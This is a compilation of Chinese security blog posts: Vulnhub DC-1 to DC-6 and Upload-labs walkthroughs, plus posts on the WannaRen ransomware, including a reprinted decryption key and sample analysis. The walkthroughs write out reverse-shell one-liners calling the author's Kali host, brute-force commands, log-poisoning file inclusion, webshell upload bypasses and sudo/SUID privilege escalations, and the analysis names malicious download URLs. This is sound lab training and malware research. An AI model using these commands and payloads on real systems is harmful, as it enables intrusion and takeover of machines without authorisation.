Vulnhub靶场之DC-6 还是老规矩。使用arp-scan -l查找我们的目标主机192.168.75.139使用nmap进一步获取相关信息 nmap -sS -A -p 1-65535 192.168.75.139开启了80-22两个端口。直接访问80进一步测试和DC2的靶场有点类似，本地还需要重定向一下、nano /etc/hosts 或编辑C:\Windows\System32\drivers\etc\hosts访问成功使用nmap漏洞扫描脚本nmap --script=vuln 192.168.75.139跑出来一些奇怪的东西，复制出来，做用户表，然后用hydra爆破？吧/usr/share/wordlists/rockyou.txt复制出来为passwd.txthydra -L user.txt -P passwd.txt wordy http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&rememberne=forever&wp-submit=Log In:S=1'可得账号，密码为：mark/helpdesk01发现有Activity monitor,这个模块的tools中的lookup存在CVE-2018-15877远程命令执行漏洞burpsuit直接反弹shellnc -lvvp 4444nc -e /bin/bash 192.168.75.129 4444根据以往的操作，进入到home目录下。应该有一些奇奇怪怪的东西在里面cd /home/mark ls cat things-to-do.txt给出了graham的密码，更换账号ssh登陆ssh graham@192.168.75.139尝试提权sudo -l发现jens账户是无密得，不过ssh是登陆不上去的，但是可以看到jens账户对backups.sh是有权限执行的，也是有写入的权限，所以，尝试在执行此文件时，顺道反弹shellecho 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| bin/sh -i 2>&1 | nc 192.168.75.129 5555' > backups.shsudo -u jens /home/jens/backups.sh攻击机监听端口5555，获得jens的shell同样，发现root账户是无密得，但是nmap是有root权限的写一个nmap的脚本，运行从而获得root权限echo 'os.execute("/bin/sh")' >root.nse ls sudo nmap --script=/home/jens/root.nse whoami cd ~ cat theflag.txt

Vulnhub靶场之DC-5 还是老规矩，先搜集一波信息arp-scan -l 检索一下我们的主机设备192.168.75.138使用nmap扫描端口信息 nmap -sS -p 1-65535 -A 192.168.75.138发现启用了nginx服务，开启着80端口。访问试试似乎是一个介绍页面，还有一个留言板发现存在index.php，solutions.php，about-us.php，faq.php，contact.php，thankyou.php，footer.php七个页面]使用kali下的自带字典因为我用的是Community版本的burp。。。。爆破没法设置线程巨慢，因此盗几张图既然是文件包含，直接老规矩去读取/etc/passwdthankyou.php?file=/etc/passwd对方使用的是Nginx，那么能不能读取出nginx的日志文件呢。查询资料得出，默认nginx的日志路径是/var/log/nginx/*.log如果说他将会读取日志。那么能否在日志里面插入一句话木马呢？插入成功上菜刀连接http://192.168.75.138/thankyou.php?file=/var/log/nginx/error.log试试看成功不出所料，又是一个低权用户那么用nc反弹到kali里面玩nc -e /bin/bash 192.168.75.129 1234nc -lvvp 1234然后我们寻找具有sudo权限的操作find / -perm -u=s -type f 2>/dev/nullscreen提权？searchsploit screen 4.5.0查找可用于screen 4.5.0的漏洞脚本文件cp /usr/share/exploitdb/exploits/linux/local/41152.txt 41152.textcp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh将41154.sh中上面一部分c语言代码另存为libhax.c 编译libhax.c文件gcc -fPIC -shared -ldl -o libhax.so libhax.c将41154.sh中下面一部分c语言代码另存为rootshell.c 编译rootshell.c文件gcc -o rootshell rootshell.c将41154.sh中剩下部分代码另存为dc5.sh脚本文件并在保存dc5.sh文件输入 :set ff=unix ，否则在执行脚本文件时后出错为dc5.sh增加可执行权限，执行dc5.sh文件，成功获取到root权限cd /tmpchmod +x dc5.shls -l./dc5.sh

Vulnhub靶场之DC-4 AIS 开头先解释一下为啥没有DC-3DC3的虚拟机安装完后，设备无法联网，内网无法被发现，因此跳过。老规矩，先查一下目标地址192.168.75.137使用nmap对目标进行扫描nmap -sS -p 1-65535 -A 192.168.75.137开启了80.22端口，直接访问80端口，看看是何方神圣还是老规矩，上Hydra大杀器hydra爆破密码： hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.75.137 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F如果你出现这种情况请进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压：gzip -d rockyou.txt.gz登录成功用burp抓包查看nc反弹shell： nc -e /bin/sh 192.168.75.129 4444发现三个账户jim的账户中有密码文件爆破猜解ssh密码，与账户 hydra -L dc4.txt -P passwd.txt -t 6 ssh://192.168.75.131登录进去。看起来好像是有一个邮件的意思噗，密码都出来了登录上去尝试sudo -l 提权，出现提示，使用teehee更改权限，并提权为root

Vulnhub靶场之DC-2 WordPress 环境：kali：192.168.75.129              DC2 -靶机 和 kali 在同一C段先是arp-scan -l检索局域网内主机发现靶机地址，使用nmap进行扫描 nmap -A -p 1-65535 192.168.75.136发现打开了80端口，SSH端口那么直接访问80看看有没有什么神奇的东西还跳转了，上hosts重定向。win10路径： C:\Windows\System32\drivers\etclinux路径：/etc/hosts 访问成功，发现flag1使用工具 cewl爬取生成密码cewl http://dc-2/ -w passwd.txt准备使用wpscan进行搞事情，但我。。上hydra大杀器吧，修是不可能修的，，，WordPress默认后台地址：/wp-admin 且WordPress当用户名不存在时会提示用户不存在，可增加爆破效率hydra -L user.txt -P passwd.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'我们跑出了 jerry和tom账户，登进去看看tom，没啥东西，jerry用户界面如下，发现了flag2啊哈想到上一个DC1的靶机是用SSH干进去的问题是，WordPress的CMS本身还是比较安全的，问题基本都出在插件上，可这个jerry的账号权限不够，无法安装插件来上传shell那就硬着头皮ssh试试看，用登录账号密码试试jerry老贼不是同一个密码，太草（一种植物）蛋了试试看Tom老贼不愧是你。。。。执行命令发现 command not found，百度得知这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径。需要自行添加BASH_CMDS[a]=/bin/sh;a $ /bin/bash export PATH=$PATH:/bin/ export PATH=$PATH:/usr/bin得到flag3切换到Jerry，发现flag4.txt哈？Git还能提权？试试看吧。看看git有没有那个权限 sudo -lflag不会骗人（小声bb）sudo git -p help !/bin/sh奇怪，我怎么没法提权，查了查百度，发现git有一个缓冲区溢出漏洞，在使用sudo git -p --help时，不需要输入root密码即可以root权限执行这条命令。我们尽量减小缓冲区的行数，使其一次性显示不完这条命令的回显结果，这样这条命令就一直处于运行状态，加上此时处于root权限，我们直接在这时候打开bash shell，直接提权至root。看起来要打开gui了，来自Xshell的鄙，艹（一种植物）奇怪的知识增加了

Vulnhub靶场之DC-1 Drupal 今天来进行CTF的小测试题，DC靶场1，难度不高，最适合我这种萌小新了。安装上ova虚拟包，看看访问正常不正常正常，上nmap扫描一下端口回到网站，查看robots.txt，看看有没有什么有用的信息比我还白，，，似乎是有一个古老的漏洞CVE，拿MSF打一下看看，搜索drupal开干，获取相应。然后Getshell这是撒？，这奇妙的名字，读取一波看看通过百度可知drupal的数据库配置文件在/sites/default/settings.php真是有趣，爆破、、、远程连接暂时不得动。不如来查看etc/passwdemmmmm这是啥啊？根据flag2提示暴力破解flag4账户密码，利用自带的medusa+John the Rippermedusa -M ssh -h 192.168.75.135 -u flag4 -P /usr/share/john/password.lst -e ns -F -M: 表示你要破解的类型。-h：目标机器地址。-u：用户名。-e : 尝试空密码。-F：破解成功后立即停止破解。-v：显示破解过程。very nice 但是确定是让我爆破？ssh连接目标emmmm。不是root玩毛线要想有root权限：1 以root账户登录(尝试使用爆破未果）2 普通用户登录，查找具有suid权限位的命令去get shellsuid权限位：说明可以以root权限执行命令可我这种垃圾怎么会提权，呜呜呜find / -type f -perm -u=s 2>/dev/nullfind / -type f -name shell -exec "whoami" \;我也不知道为什么要用find 哈哈哈这这这。。。root权限？find / -type f -name shell -exec "/bin/sh" \;跑一波sh试试搞定。。。

Upload-labs靶场11-19关记录 下午继续来打这个upload靶场第十一关：观察源码，发现存在字符拼接。黑名单被取而代之变成白名单。当有php环境中有两个截断条件：1.php版本小于5.3.4 详情关注CVE-2006-72432.php的magic_quotes_gpc为OFF状态，便会有00截断，利用00截断上传。因为我用的是php73，改成52进行试验改为上传成功第十二关：这里保存用了post方法，所以要用burp再16进制里面改，因为post不会像get对%00进行自动解码。上传成功第十三关：上传图片马即可。copy normal.jpg /b + shell.php /a webshell.jpg上传成功第十四关：和第十三关很类似，只不过变成imagesize校验。依然可以通过图片马绕过上传上传成功第十五关：这里用到php_exif模块来判断文件类型，还是直接就可以利用图片马就可进行绕过：不过，我起初多次测试，老是报错然后我才发现，我exif模块没开，，，上传成功第十六关：本关综合判断了后缀名、content-type，以及利用imagecreatefromgif判断是否为gif图片，最后再做了一次二次渲染，绕过方法：上传成功第十七关：本关是条件竞争，查看代码：这里先将文件上传到服务器，然后通过rename修改名称，再通过unlink删除文件，因此可以通过条件竞争的方式在unlink之前，访问webshell。首先在burp中不断发送上传webshell的数据包然后不断在浏览器中访问，发现通过竞争可以访问到：第十八关：和前一关非常类似，只不过结和前面几关的方法，对文件后缀名做了白名单判断，然后会一步一步检查文件大小、文件是否存在等等，将文件上传后，对文件重新命名，同样存在条件竞争的漏洞。可以不断利用burp发送上传图片马的数据包，由于条件竞争，程序会出现来不及rename的问题，从而上传成功：第十九关:CVE-2015-2348 move_uploaded_file() 00截断，上传webshell，同时自定义保存名称，直接保存为php是不行的发现move_uploaded_file()函数中的img_path是由post参数save_name控制的，因此可以在save_name利用00截断绕过

Upload-labs靶场6-10关记录 今天继续练习upload靶场第六关：对文件末尾进行了处理，但是对于windows的特性，我们可以在后缀前添加空格来绕过解析，打开burp截断修改上传成功第七关：相比第六关，第七关抛弃了去后缀点的操作，但是对于windows系统，后缀的点将会自动删除，用burp截断添加一个点第八关：与第七关相比，缺少了对DATA流的处理，在PW环境的情况下：如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名老规矩，上万能的burp，截断修改上传成功第九关：程序先是去除文件名前后的空格，再去除文件名最后所有的.，再通过strrchar来寻找.来确认文件名的后缀，但是最后保存文件的时候没有重命名而使用的原始的文件名，导致可以利用类似one.php. .(两个点号之间有一个空格)绕过，如果重名名了文件的话应该会用$file_ext来进行拼凑文件，这样保存在服务器中的文件将没有后缀（去除了.空格）上burp截断修改成功第十关：黑名单加重写，使用双写后缀绕过成功

Upload-labs靶场1-5关记录 工具：upload-labs靶场源码一枚，Phpstudy大法一个，Burp项目地址：https://github.com/Tj1ngwe1/upload-labs首先先安装好靶场，有Web基础的话，我就不再说了，windows平台拿phpstudy就好了。。。过程先从第一关开始：先看到有一个上传点，尝试上传webshell被拦截，点击查看代码，查看关键点，发现存在前端js验证那么可以选择关闭浏览器js进行测试，这里我选择使用burp进行改包，先把webshell改成.png上传，用burp改为php后缀成功第二关：老规矩，直接查看源码：对content-type:类型进行了规定，尝试使用burp截断修改绕过上传成功第三关：上传特殊解析后缀绕过常见特殊解析后缀有asp:asa,cer,cdxaspx:ashx,asmx,ascxphp:php2、php3、php4、php5、phps、phtmljsp:jspx,jspf那么，吧后缀改成php2上传成功第四关：很明显，这次连解析也没的玩了，考虑到我的目标http服务是apache，尝试使用htaccess文件将指定文件解析为脚本编写文件<FilesMatch "5"> SetHandler application/x-httpd-php </FilesMatch>解析为php成功第五关：很明显，连h文件都被屏蔽了，怎么办呢，服务器对上传文件的解析貌似只存在小写，使用大写来绕过测试。成功上传解析

WannaRen勒索病毒作者主动向火绒提供解密密钥（转载） 4月9日，“WannaRen”勒索病毒作者通过多方主动联系到火绒，并提供了相关解密密钥。经火绒工程师分析后，验证密钥有效，稍后也会发布针对该病毒的解密工具，欢迎关注火绒各官方平台随时获悉通知。被该病毒攻击加密文件的用户也可以随时联系我们获取帮助。此外，我们也将在文末公布该密钥，分享给广大安全同行和专业团队，共同开发解密工具，帮助遭遇该病毒的用户解决问题，挽回损失。9日上午，一名火绒用户以解密为由，通过邮件尝试联系“WannaRen”勒索病毒作者获取更多信息。该作者在要求火绒用户支付比特币作为赎金未果后，竟主动提供病毒解密钥匙，并要求该火绒用户将密钥转发给火绒团队，制作“相应解密程序”。从上述邮件可以看出，该病毒作者在使用英语进行交流后，又使用了中文进行沟通，再加上火绒此前披露该病毒使用易语言编写的情况来看，极有可能为国人所为。至此，随着事件发酵，各媒体、安全厂商进行了大量的曝光和溯源调查，截止目前，该病毒作者提供的比特币钱包未收到任何赎金，而该作者也已经停止下发、传播“WannaRen”勒索病毒。-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAxTC/Igjuybr1QbQ1RmD9YxpzVnJKIkgvYpBrBzhsczHQ8WeC 7ikmC5jTbum1eCxTFTxvtnONEy2qDbnSS5fbK/lxYExj6aDLKzQxXCOVSdSQCesW g1i5AAdUC9S246sdS9VKxT0QL24I+SG+ixckBhcB+ww6z47ACegoH0aLDwvRvehZ Ycc1qFr1lhRXQpHunrlg4WRphH5xBbszOI+dFRDOpprnbN56CHoLb0q1SzzV3ZFA FF6Df68Pux1wMHwEXbULRHo5AIZJPJq8L9ThWVsj6v42jAjJQ8m8bRh0+Jz4Rohk WwPgL+VFxDG2AiiCU5/yLNoQX0JM9VWBxy6Z3QIDAQABAoIBADi/KoH06CMNtn7O CXbTepgGiKKcCVGMTHak8OgHCM6ty19tVnSLSvOTa2VDxIFs4AwAdHWhEzwtq/5/ N1GhxeUFx+balPYq28z3HC1T4CZ7EWiJStVJtxOXCEzPTkJ+f9PO8dGJHRtJIzPu zhLg+fD2tg81GceZYRJ4yPMXLfWKA5DmGkRv/1Usq5zvMClLdrmw/q2rnCbRLdeE EAzSAi9kqsnEaZKfCbXb/gby+bUwAgn7mxs+CJ611hzD/r2w9dgXkaUJYuKRRv+B GlQHBRQ7hXogkIzeaGqmw8M3xko7xzADsytFYxt2Kthuww2YV4E6Q1Hl4bBW0q+g w+jSolECgYEA0Tnns+LaqMd5KCQiyWlCodQ2DtOMOefhIrJbRhdAkAq6FtVICxkL nIJL0gmo4T/zDaMr8vsn7Ck+wLjXUsYt1/EulLtVnuH76FU0PkjJqBdre5Gjf23/ YGHW7DJEoH3p/7DIgV4+wXPu6dD+8eECqwm1hLACOxkfZnOFZ1VGxeMCgYEA8UYH jaA69ILlz0TzDzoRdTmam6RDqjsVO/bwaSChGphV0dicKue25iUUDj87a1yLU5Nq t0Kt0w1FL/iile1Eu4fe4ryukPGw2jAZh/xq7i2RRSFLXim5an9AbBVQ55478AJa sTaIOSoODgBspsBLShnXQRKEfwYPv2GthhcJLT8CgYAssRDERQ3uBYXkxCtGGJzq Enllm1yVtelKTwzeIPNikVgErpRQAo6PZOmrOPMBAnb5j8RAh9OUR48m/ZTJEpoS SWtoy8dTQ/RaQXECaOviYvZLk+V3v9hQDzYoh+hO2/aS7oE12RrQmeILwd/jbOvz +wPyDuK7GvexG7YAR5/xfwKBgQCA8p6C0MnxeCv+dKk60BwYfKrm2AnZ5y3YGIgw h2HS5uum9Y+xVpnnspVfb+f/3zwPdNAqFZb1HziFBOtQGbkMSPeUUqcxjBqq4d4j UYKMvQnQ2pR/ROl1w4DYwyO0RlteUMPLxotTkehlD1ECZe9XMSxb+NubT9AGxtuI uLMM3QKBgGl0mYCgCVHi4kJeBIgabGqbS2PuRr1uogAI7O2b/HQh5NAIaNEqJfUa aTKS5WzQ6lJwhRLpA6Un38RDWHUGVnEmm8/vF50f74igTMgSddjPwpWEf3NPdu0Z UIfJd1hd77BYLviBVYft1diwIK3ypPLzhRhsBSp7RL2L6w0/Y9rf -----END RSA PRIVATE KEY----- 转载地址：http://bbs.huorong.cn/thread-68350-1-1.html不知道为什么，突然很想笑

对WannaRen勒索病毒溯源新进展 恶意软件伪装为激活工具（kms）分发万恶的下载站，，勒索提示信息为“WannaRen”，排查发现主机不存在MS17-010漏洞。了解到之前下载过KMS类的系统激活工具。分析发现KMS工具存在访问URL加载其他恶意程序的行为。点名某西下载站。安全你XX呢？鬼话连篇发现在“kms激活工具 19.5.2.exe”程序中，捆绑了powershell恶意代码。如下病毒信息恶意代码执行时，首先延时2000秒（33分钟），一定程度上造成没有恶意行为的假象，影响安全研究人员分析；如果系统中安装了360、QQ防护则不执行后续代码。然后呢。勒索病毒代码以“白加黑”的形式被调用，匿影病毒传播脚本会将“白加黑”恶意模块（wwlib.dll和WinWord.exe）下载到c:\ProgramData目录执行。病毒运行后，会将C:\ProgramData\WinWord.exe注册为系统服务，电脑重启后即会执行恶意代码，加密用户文件。主要通过“匿影”病毒传播脚本进行下发。目标地址1：http://cs.sslsngyl90.com 目标地址2：http://cpu.sslsngyl90.com/vip.txt病毒脚本执行后，会下载执行多个恶意模块，其中包括：勒索病毒、挖矿病毒、永恒之蓝漏洞攻击工具。其中，永恒之蓝漏洞攻击模块会在网络内通过漏洞攻击的方式传播恶意代码。在攻击成功后，会在被攻击终端中运行远程恶意脚本（my****.at.ua/vip.txt），此脚本于报告上述vip.txt恶意脚本模块逻辑基本相同，同为下载执行上述诸多恶意模块，也不排除该恶意脚本下载执行WannaRen勒索病毒的可能性。截止昨晚获取到该脚本时候，内部恶意代码已被删除。获取到的powershell脚本主要功能为：下载程序到本地执行。其中的WINWORD.EXE带数字签名，可以绕过杀软检测，wwlib.dll使用vmp加壳，其编译信息和加壳信息与WannaRen勒索信息程序一致。@WannaRen@.exe程序PE信息wwlib.dll程序PE信息在分析环境，wwlib.dll不能被运行，所以无法确认是否存在加密行为。截止目前8号下午5点，已发出的安全分析文章，认为该程序（wwlib.dll）即WannaRen的加密模块。勒索病毒行为该勒索病毒采用对称和非对称（RSA+RC4）加密，除非得到勒索病毒作者的私钥，否则无法进行解密。勒索病毒首先生成随机的RC4密钥，如“p2O6111983YU1L “，并使用这个单一密钥加密所有文件，被加密的文件会被添加.WannaRen后缀。生成密钥后，病毒会导入RSA公钥对随机生成的RC4密钥进行加密，并存储在每个加密文件的头部。具体代码，如下图所示：生成随机的RC4密钥导入公钥加密RC4密钥病毒作者的公钥使用RC4算法加密原始文件为了使勒索后的电脑可以继续使用，勒索病毒在加密时会跳过特殊路径，跳过的路径关键字勒索病毒会加密特定扩展名的文件加密的文件扩展名加密后的文件由两个部分组成， 前面为加密后的RC4密钥，后面为加密后的文件内容被加密后的示例文件内容勒索病毒在加密每个文件夹时会释放勒索说明文档，且完成后会在公用桌面上创建“想解密请看此文本.gif”、“想解密请看此文本.txt“以及一个解密程序” @WannaRen@.exe “后门、勒索、挖矿一体的下载器上述分析的其实只是恶意代码的“冰山一角”，hxxp://cs.sslsngyl90.com中后续的代码还会执行更多的行为，包括：下载并执行挖矿程序（门罗币）下载“永恒之蓝”工具包并集成批量扫描工具Everything工具外壳程序，实际为木马程序，开放并监听本地3611端口甚至包含一些驱动程序，创建设备\\Device\\WinRing0_1_2_0等。门罗币挖矿进程：成功下载到本地的文件同时，该病毒存在一些“缺陷”，即部分URL已经“失效”或者返回404，导致脚本异常退出中断执行。各模块hash：WINWORD.EXE       CEAA5817A65E914AA178B28F12359A46wwlib.dll                  9854723BF668C0303A966F2C282F72EAyou                          2D84337218E87A7E99245BD8B53D6EABnb.exe                     CA8AB64CDA1205F0993A84BC76AD894Aofficekms.exe          39E5B7E7A52C4F6F86F086298950C6B8WinRing0x64.sys     0C0195C48B6B8582FA6F6373032118DA防护建议不要下载或打开来路不明的文件，并且及时备份重要数据，妥善保管。安装并使用具备主动防御功能的终端防护软件，并及时更新病毒库版本。下载软件请前往官网下载，尽量避免使用下载站下载。文章改编自：绿盟公众号：https://mp.weixin.qq.com/s?__biz=MzU3NTcxNjkwMg==&mid=2247484397&idx=1&sn=576a65b3554fdabf37c904d92d921878&chksm=fd1fa8a4ca6821b21b09f7f48d9be0294d5243891f0cfa1af7328142e6d3309c67e0770b4c1a&mpshare=1&scene=23&srcid=&sharer_sharetime=1586358489740&sharer_shareid=4e6650b4a46c26f146a18e879fa887b8#rd吾爱破解论坛（火绒安全）：https://www.52pojie.cn/thread-1151815-1-1.html实际测试如何，从群友那边获取来的中毒虚拟机压缩包已经在路上了

对某网传WannaRen的跟进 15小时后，正准备狠狠心做win10实体机测试的时候，最早让吾做分析的同学通知我。火绒实验室也发表了同样的结论于是抱着能懒就懒的精神，我索性不测试了。（1w的电脑可不敢折腾哦。。）直接上图：暂时火绒实验室的说法与吾的分析大同小异，这只是一个释放的解密程序（猜中了千千万，就是没确定是个解密。。），而源病毒暂时未找到文件（就说源病毒为啥会用易语言写。。。。）引用火绒官方的话：目前，感染该勒索病毒的文件还无法被破解。建议用户不要轻易使用安全软件对该解密工具进行查杀，以免无法赎回被加密的重要资料。同时，360安全也发表了结论，不过毕竟是大团队，拿到的是原版，也是得出我们所分析的文件乃是释放的解密工具的情况。最后稍安勿躁，等待专家的结果，另外可参考本站对0796漏洞分析，及时升级系统打上补丁，防止被传播文章地址：https://www.jcdpn.cn/?p=96

对某网传WannaRen的分析 判断可能具有反虚拟机能力，据传有穿透虚拟化能力，打开软件无效果，初步判断套了软件壳打开过检测的虚拟机，据说会加密win10，因此拿win7进行检测，这是网友分享的据说是原版的样本下载进行测试，发现360大爷直接报毒关闭360和360相关的安全模块，为了宿主机安全起见，断开虚拟机网卡，且拍摄快照，打开宿主机两个安全软件直接赋予管理员权限运行可能是因为win7的缘故，我没能见识到他的发作，只有一个怪异的页面。说明缴纳0.05的BTC。但是，，这方方块块的边框是怎么回事？？？巨眼熟有没有。？？？真的是似曾相识，有点眼熟啊。莫非我拿的真的是假的？？反编译试试看直接丢到OD里面，在搜索ASCII和Unicode，还卡住了，还有这乱糟糟的内容，一定具有加密壳等了5分钟终于载入出来了，然后翻着翻着看到这个区块。我4不4发现了什么不对劲的东西，这个完美的程序为什么有如此怪异的名字？好像是有点像？and。。。。这个奇妙的字段又代表着什么。。。继续翻看数据内容，发现调用了打印机的借口？人类迷惑行为。这么壕无人性的程序您居然是用易语言写的？？？放在微步云沙箱测试看看还发现发起了TCP连接，目标疑似是一个谷歌云的北京节点（为啥在国内诶？）从另外一份分析中看出，这个地址不是唯一的，经过直接访问，发现是谷歌云CDN节点对于为什么有一个访问谷歌的CDN地址，我做出如下两个判断1.程序可能调用其作者部署在网站上API接口来验证是否为正确密匙。 2.可能还存在一个核心的解密程序，分发在谷歌云的CDN上来实现全球操作第一种问题倒是不大，吾本人倒是比较惧怕出现第二种情况，若这个程序纯粹只是一个用作验证秘钥的程序，那么用于真正解密的核心程序是否会在用户电脑上埋雷？这就无从考究了看起来VMP壳的猜测是对的，但是依然不确定是否为易语言程序以及是否为源病毒。为此，我联系上了群内的一位逆向大佬，等待明天回音。对于加密文件和传播，目前没发现这个EXE具有加密行为，也未进行除谷歌云的443端口外的其他端口的请求，严重怀疑拿到的是释放文件。上图是据说原版的多个版本，在win7下均未出现问题，如前文所述如出一辙。写到这里的时候，大佬也回了我的疑问。大佬非常确信的验证了我的假想总结：目前所测试的程序由易语言编写而成，不具有传播能力，外包VMP软件壳加密内容，反调试。且调用未知的谷歌CDN节点地址，疑似空壳或单一功能的释放文件。后续如何请看明日后续